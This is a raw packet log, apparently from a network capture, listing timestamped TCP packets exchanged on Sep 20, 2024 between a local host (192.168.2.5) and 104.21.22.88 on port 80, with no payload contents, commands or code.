                                                              Sep 20, 2024 12:00:12.926810980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926811934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926826954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926841021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926848888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926848888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926856995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926872969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926887989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926896095 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926903009 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926914930 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926919937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926945925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926953077 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926963091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926978111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.926984072 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.926995993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927011967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927016973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927033901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927050114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927054882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927067041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927086115 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927090883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927108049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927123070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927124977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927140951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927158117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927161932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927174091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927190065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927196980 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927206993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927222013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927226067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927242041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927258015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927262068 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927275896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927294970 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927299976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927325964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927340031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927340984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927357912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927371979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927375078 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927405119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927407026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927429914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927445889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927460909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927470922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927479029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927493095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927496910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927510023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927525997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927534103 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927542925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927558899 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927561045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927576065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927589893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927593946 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927607059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927622080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927623987 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927639008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927654028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927655935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927671909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927686930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927689075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927704096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927719116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927726030 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927737951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927753925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927756071 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927771091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927787066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927792072 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927803993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927819014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927824974 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927835941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927850962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927854061 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927870035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927885056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927887917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.927901030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:12.927925110 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:12.976373911 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.015832901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015856028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015871048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015886068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015902042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015916109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015932083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015945911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015959978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015975952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.015990973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016005993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016021013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016032934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016037941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016055107 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016071081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016166925 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016227961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016243935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016259909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016297102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016518116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016555071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016567945 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016580105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016596079 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016611099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016622066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016625881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016643047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016655922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016658068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016675949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016681910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016693115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016709089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016715050 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016726017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016743898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016752005 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016761065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016777039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016786098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016792059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016808033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016813993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016824007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016841888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016844988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016855955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016880035 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016906977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016923904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016937971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016952991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016954899 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016969919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.016974926 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.016985893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017002106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017016888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017019033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.017044067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.017647982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017705917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.017720938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017779112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017812967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017827034 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.017867088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017899990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017914057 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.017952919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017987013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.017999887 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018014908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018038034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018054008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018054008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018070936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018088102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018094063 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018104076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018121004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018126965 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018146992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018162012 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018163919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018179893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018194914 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018203974 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018212080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018229008 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018234015 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018254042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018265963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018270969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018287897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018302917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018307924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018318892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018335104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018345118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018351078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018371105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018376112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018392086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018412113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018413067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018438101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018450022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018456936 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018472910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018486977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018493891 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018515110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018528938 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018532038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018548965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018563986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018568993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018579960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018594980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018606901 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018610954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018626928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018631935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018642902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018657923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018671989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018672943 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018688917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018697977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018706083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018721104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018726110 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018734932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018750906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018762112 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018767118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018780947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018789053 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018798113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018814087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018827915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018834114 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018843889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018856049 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018857956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018879890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018879890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018897057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018909931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018923044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018927097 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018943071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018949032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018959045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018975019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.018981934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.018990993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019006014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019013882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.019020081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019036055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019048929 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.019051075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019068956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019073963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.019084930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019099951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019110918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.019114017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019130945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019134045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.019148111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.019174099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.070115089 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106302023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106323004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106343031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106445074 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106631994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106654882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106671095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106686115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106689930 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106702089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106715918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106718063 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106731892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106745958 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106750011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106775045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106780052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106797934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106812954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106818914 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106829882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106846094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.106853008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.106885910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107187033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107209921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107225895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107239962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107253075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107254982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107271910 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107279062 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107295990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107306957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107322931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107338905 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107353926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107363939 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107371092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107394934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107403994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107420921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107435942 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107446909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107451916 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107470036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107475996 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107510090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107537985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107553959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107568979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107584000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107592106 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:13.107601881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:13.107619047 CEST8049724104.21.22.88192.168.2.5
